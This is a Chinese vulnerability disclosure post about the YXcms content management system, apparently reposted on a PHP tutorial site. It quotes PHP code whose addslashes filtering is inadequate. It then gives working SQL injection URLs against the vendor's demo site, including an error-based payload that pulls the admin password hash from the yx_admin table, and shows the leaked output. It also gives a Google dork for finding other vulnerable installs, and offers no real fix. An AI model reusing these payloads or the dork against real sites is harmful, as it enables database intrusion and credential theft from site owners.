来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 这楼的没啥技术含量,本菜鸟刚接触代码审计,可能分析的不对。漏洞文件protected apps default controller indexController php关键代码public function search(){ if(empty($_GET[ 39;keywords...
这楼的没啥技术含量,本菜鸟刚接触代码审计,可能分析的不对。
漏洞文件protected\apps\default\controller\indexController.php
关键代码
public function search() { if(empty($_GET['keywords'])||empty($_GET['type'])) $this->error('搜索条件不足~'); $keywords=in(urldecode(trim($_GET['keywords']))); $type=in($_GET['type']); $listRows=10;//每页显示的信息条数,2n偶数 $url=url('index/search',array('keywords'=>urlencode($keywords),'type'=>$type,'page'=>'{page}')); $where="ispass='1' AND (title like '%".$keywords."%' OR description like '%".$keywords."%')";
全局过滤代码
protected\include\lib\common.function.php
function in($data,$force=false){ if(is_string($data)){ $data=trim(htmlspecialchars($data));//防止被挂马,跨站攻击 if(($force==true)||(!get_magic_quotes_gpc())) { $data = addslashes($data);//防止sql注入 } return $data; } else if(is_array($data)) { foreach($data as $key=>$value){ $data[$key]=in($value,$force); } return $data; } else { return $data; } }
keywords 靠addslashes这个过滤,无语了
http://demo.yxcms.net/index.php?r=default/index/search&keywords=a%2527%C2%95%C2%8A&type=all
出错信息: MySQL Query Error
SQL: SELECT count(*) FROM yx_news WHERE ispass='1' AND (title like '%a'%' OR description like '%a'%')
错误详情: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR description like '%a'%')' at line 1
错误代码:1064
危害
google search
inurl:index.php?r=default/page
http://www.google.com.hk/#newwindow=1&q=inurl:index.php%3Fr%3Ddefault/page&safe=strict&start=90
用的也比较多了 算通用了吧。
其实很多地方引用这个过滤。。顺便送个爆hash exp
http://demo.yxcms.net/index.php?r=default%2Fextend%2Findex&id=100023%20AND%20%28SELECT%201660%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716d667271%2C%28SELECT%20MID%28%28IFNULL%28CAST%28password%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20yx_admin%20WHERE%20username%3D0x61646d696e%20LIMIT%200%2C1%29%2C0x716e6e7371%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29
出错信息: MySQL Query Error
SQL: SELECT id,type,name,method,url,extendid FROM yx_sort WHERE id IN(100023 AND (SELECT 1660 FROM(SELECT COUNT(*),CONCAT(0x716d667271,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM yx_admin WHERE username=0x61646d696e LIMIT 0,1),0x716e6e7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)) ORDER BY deep
错误详情: Duplicate entry 'qmfrq44f76bda33900c7a9b984674f283fdafqnnsq1' for key 'group_key'
错误代码:1062
修复方案:
不懂开发,请自行百度下,应该有相关通用防注入代码
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com